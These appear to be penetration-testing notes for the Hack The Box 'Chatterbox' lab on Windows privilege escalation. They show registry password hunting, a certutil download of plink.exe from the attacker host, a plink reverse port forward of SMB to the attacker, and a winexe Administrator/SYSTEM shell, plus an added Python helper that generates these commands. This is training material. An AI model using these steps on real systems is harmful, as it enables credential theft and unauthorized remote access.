Passwords and Port Forwarding
plink.exe
Enumeration
Hunt for passwords in the registry (run the same query against HKCU as well, since user-specific software often stores credentials there):
reg query HKLM /f password /t REG_SZ /s
Look for internal open ports, i.e. ports in LISTENING state that your external scan did not show (bound to 127.0.0.1 only, or bound on a routable address but blocked by the host firewall):
netstat -ano
If we find a credential and internal open ports
Exploitation
On your attack machine, edit /etc/ssh/sshd_config so that root can log in over SSH with a password; the plink.exe command below authenticates as root with -pw, which requires PermitRootLogin yes (and password authentication left enabled):

Restart SSH service:
service ssh restart
Download plink.exe to your attack machine:
Transfer plink.exe to the victim machine (serve it over HTTP from your attack machine first, for example with Python's http.server module, then fetch it from the victim):
certutil -urlcache -f http://<local_ip>/plink.exe plink.exe
On the victim machine, set up a remote port forward (suppose we want to forward port 445). With -R, connections to 127.0.0.1:445 on your attack machine are relayed to 127.0.0.1:445 on the victim. Make sure nothing on your attack machine already listens on 445 (for example a local smbd), or the remote bind will fail:
plink.exe -l root -pw <your_kali_password> -R 445:127.0.0.1:445 <local_ip>
Accept the host-key prompt and press Enter a few times until you get a prompt. Then use winexe through the forwarded port to spawn a shell with the credential you found (the command as written runs as Administrator; add winexe's --system flag if you want the shell running as SYSTEM):
winexe -U Administrator%<password> //127.0.0.1 "cmd.exe"
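The following is an added example, not code from the original notes. It ties the enumeration step (reading netstat -ano) to the exploitation step (building the plink.exe forward and the winexe command): it parses netstat output, subtracts the ports your external scan already saw, and emits a plink -R line for each port that is only reachable from inside the victim. The netstat text is a constructed sample, 192.0.2.10 is a placeholder victim address, and <local_ip> and <your_kali_password> are the notes' own placeholders.

```python
"""Triage `netstat -ano` output for ports that listen on the victim but were not
reachable in the external scan, and build the matching plink.exe forward.

Added example, not code from the original notes. The netstat text below is a
constructed sample, 192.0.2.10 is a placeholder victim address, and
<local_ip> / <your_kali_password> are the notes' own placeholders.
"""
from typing import Dict, List, NamedTuple, Set


class Listener(NamedTuple):
    proto: str
    addr: str
    port: int
    pid: int


# Constructed sample of `netstat -ano` output (not a real capture).
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       700
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:9255           0.0.0.0:0              LISTENING       1864
  TCP    127.0.0.1:5040         0.0.0.0:0              LISTENING       1340
  TCP    192.0.2.10:139         0.0.0.0:0              LISTENING       4
  TCP    192.0.2.10:9255        198.51.100.7:51422     ESTABLISHED     1864
  TCP    [::]:135               [::]:0                 LISTENING       700
  UDP    0.0.0.0:500            *:*                                    1024
"""

# Ports the external nmap scan reported open (constructed to match the sample).
EXTERNAL_OPEN: Set[int] = {135, 139, 9255}


def parse_listeners(netstat_output: str) -> List[Listener]:
    """Return TCP sockets in LISTENING state. UDP rows carry no state column
    and cannot be forwarded with plink -R, so they are skipped."""
    listeners = []
    for line in netstat_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "TCP" or fields[3] != "LISTENING":
            continue
        # rsplit on the last ':' so IPv6 forms like [::]:135 parse correctly.
        addr, port = fields[1].rsplit(":", 1)
        listeners.append(Listener("TCP", addr, int(port), int(fields[4])))
    return listeners


def internal_ports(listeners: List[Listener], external_open: Set[int]) -> Dict[int, str]:
    """Ports listening on the victim that the external scan did not see.
    The value says why: bound to loopback only, or bound on a routable
    address but filtered (typically by the host firewall)."""
    result: Dict[int, str] = {}
    for l in listeners:
        if l.port in external_open:
            continue
        loopback = l.addr in ("127.0.0.1", "[::1]")
        reason = "loopback-only" if loopback else "filtered"
        # A port bound on both loopback and a routable address counts as filtered.
        if result.get(l.port) != "filtered":
            result[l.port] = reason
    return result


def plink_forward(port: int, local_ip: str, password: str, user: str = "root") -> str:
    """Command to run on the victim: expose the victim's 127.0.0.1:<port> as
    127.0.0.1:<port> on the attack machine (needs root password login enabled
    in sshd_config, as the notes describe)."""
    return f"plink.exe -l {user} -pw {password} -R {port}:127.0.0.1:{port} {local_ip}"


def winexe_command(user: str, password: str, system: bool = False) -> str:
    """winexe over the forwarded SMB port. `--system` asks winexe to run the
    command as SYSTEM; without it the shell runs as the supplied user."""
    flag = "--system " if system else ""
    return f'winexe -U {user}%{password} {flag}//127.0.0.1 "cmd.exe"'


if __name__ == "__main__":
    found = internal_ports(parse_listeners(SAMPLE_NETSTAT), EXTERNAL_OPEN)
    for port, why in sorted(found.items()):
        print(f"{port:5d}  {why:13s}  {plink_forward(port, '<local_ip>', '<your_kali_password>')}")
    if 445 in found:
        print(winexe_command("Administrator", "<password>", system=True))
```

On the sample, 445 is bound on 0.0.0.0 but absent from the external scan, so it is reported as filtered (the host firewall case), while 5040 is loopback-only; both get a plink -R line, and the 445 entry additionally gets the winexe command.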
Lab: Hack The Box - Chatterbox